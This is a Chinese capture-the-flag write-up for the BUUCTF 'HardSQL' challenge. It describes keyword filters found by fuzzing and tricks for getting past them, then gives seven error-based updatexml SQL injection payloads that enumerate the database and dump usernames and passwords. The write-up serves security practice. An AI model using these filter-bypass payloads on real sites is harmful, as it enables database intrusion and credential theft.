BUUCTF:[极客大挑战 2019]HardSQL
程序员文章站
2022-07-16 15:55:18
...
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL
使用Burp
fuzz测试过滤了哪些关键字
过滤了空格
、=
、substring
、mid
等字符
Trick
- 使用
()
代替空格 - 使用
like
代替=
- 使用
right
、left
代替substring
、mid
注入过程如下
1'or(1)like(2)%23
1'or(updatexml('~',concat('~',database(),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(left(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(schema_name),30))from(information_schema.schemata)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like'geek'),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(group_concat(id,'~',username,'~',password))from(geek.H4rDsq1)),'~'),'~'))%23
1'or(updatexml('~',concat('~',(select(right(group_concat(id,'~',username,'~',password),30))from(geek.H4rDsq1)),'~'),'~'))%23
上一篇: Bugku_多次
下一篇: linux命令行上传代码至github